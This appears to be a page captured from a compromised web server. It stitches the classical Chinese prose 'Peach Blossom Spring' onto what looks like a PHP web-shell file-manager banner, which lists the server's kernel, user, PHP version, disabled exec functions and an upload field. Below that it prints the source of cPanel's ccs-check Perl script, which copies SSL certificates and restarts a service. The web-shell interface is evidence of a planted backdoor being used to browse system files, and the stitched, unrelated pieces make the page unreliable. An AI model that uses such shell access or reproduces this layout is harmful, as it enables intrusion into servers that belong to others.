晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。 林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。 见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝) 既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。 南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。
|
Server : Apache System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64 User : rainic ( 1014) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system Directory : /proc/thread-self/root/scripts/ |
Upload File : |
#!/usr/local/cpanel/3rdparty/bin/perl
# cpanel - scripts/ccs-check Copyright 2022 cPanel, L.L.C.
# All rights reserved.
# copyright@cpanel.net http://cpanel.net
# This code is subject to the cPanel license. Unauthorized copying is prohibited
use strict;
use warnings;
# Make sure we get exactly the args we want, with a little flexibility for calling --help, -h, -HELP, etc.
exit script() unless caller;
sub script {
my $args_ok = 0;
my $update_ssl = 0;
my $no_restart = 0;
my $force_run = 0;
foreach my $arg (@ARGV) {
if ( $arg =~ m/^-{1,2}h/i ) {
show_usage();
return 0;
}
elsif ( $arg eq '--run' ) {
$args_ok = 1;
}
elsif ( $arg eq '--ssl' ) {
$update_ssl = 1;
}
elsif ( $arg eq '--force' ) {
$force_run = 1;
}
elsif ( $arg eq '--norestart' ) {
$no_restart = 1;
}
else {
print "Unknown arguments passed.\n";
show_usage(1);
return 1;
}
}
if ( $args_ok != 1 ) {
show_usage();
return 1;
}
# If it's not installed, just abort
if ( !$force_run && !-f '/opt/cpanel-ccs/bin/run' ) {
return 0;
}
# Handle updating of SSL pem for CCS
if ( $update_ssl == 1 ) {
require Cpanel::SSLService;
my %ssl_info = Cpanel::SSLService::getsslargs();
require Cpanel::SafetyBits::Chown;
require Cpanel::MD5;
my $target_pem = '/opt/cpanel-ccs/conf/cpanel.pem';
my $orig_md5;
if ( -f $target_pem ) {
$orig_md5 = Cpanel::MD5::getmd5sum($target_pem);
}
if ( defined( $ssl_info{'SSL_cert_file'} ) ) {
require Cpanel::FileUtils::Copy;
if ( !-d '/opt/cpanel-ccs/conf' ) {
require Cpanel::SafeDir::MK;
Cpanel::SafeDir::MK::safemkdir('/opt/cpanel-ccs/conf');
if ( $< == 0 ) {
Cpanel::SafetyBits::Chown::safe_chown( 'cpanel-ccs', 'cpanel-ccs', '/opt/cpanel-ccs/conf' );
}
}
# If we have a combined pem, use that, otherwise we need to build a PEM from what we have.
if ( $ssl_info{'SSL_cert_file'} eq $ssl_info{'SSL_key_file'} ) {
Cpanel::FileUtils::Copy::safecopy( $ssl_info{'SSL_cert_file'}, $target_pem );
if ( $< == 0 ) {
Cpanel::SafetyBits::Chown::safe_chown( 'cpanel-ccs', 'cpanel-ccs', $target_pem );
}
}
else {
my $pem_contents;
# pem order is key > cert > ca
foreach my $file ( $ssl_info{'SSL_key_file'}, $ssl_info{'SSL_cert_file'}, $ssl_info{'SSL_ca_file'} ) {
if ( open my $read_fh, '<', $file ) {
while ( my $line = <$read_fh> ) {
$pem_contents .= $line;
}
}
}
require Cpanel::FileUtils::Write;
Cpanel::FileUtils::Write::write( $target_pem, $pem_contents );
if ( $< == 0 ) {
Cpanel::SafetyBits::Chown::safe_chown( 'cpanel-ccs', 'cpanel-ccs', $target_pem );
}
}
}
else {
# If the system for some reason doesn't report cert info, fall back to the self signed pem that comes with CCS
Cpanel::FileUtils::Copy::safecopy( '/opt/cpanel-ccs/twistedcaldav/test/data/server.pem', $target_pem );
}
if ( -f $target_pem ) {
if ( $no_restart == 0 ) {
my $current_md5 = Cpanel::MD5::getmd5sum($target_pem);
if ( !defined($orig_md5) || ( defined($orig_md5) && ( $orig_md5 ne $current_md5 ) ) ) {
print "SSL information changed, restarting CCS..\n";
require Cpanel::SafeRun::Simple;
Cpanel::SafeRun::Simple::saferun(qw{systemctl restart cpanel-ccs});
}
}
}
print "SSL information updated.\n";
}
return 0;
}
###[ Functions ]########################################################################################################
sub show_usage {
my ($use_stderr) = @_;
my $out_fh = ( $use_stderr ? \*STDERR : \*STDOUT );
print $out_fh <<EOF;
This script handles some maintenance for the Calendar and Contacts Server plugin, if installed.
Usage:
scripts/ccs-check <--help|--run|--ssl>
--help : Show this output
--run : Actually run this script
--ssl : Copy the SSL certificate information in to place
--force : Copy the SSL certificate information in to place regardless if CCS is installed or not
--norestart : Don't restart CCS even if SSL information is updated
EOF
return;
}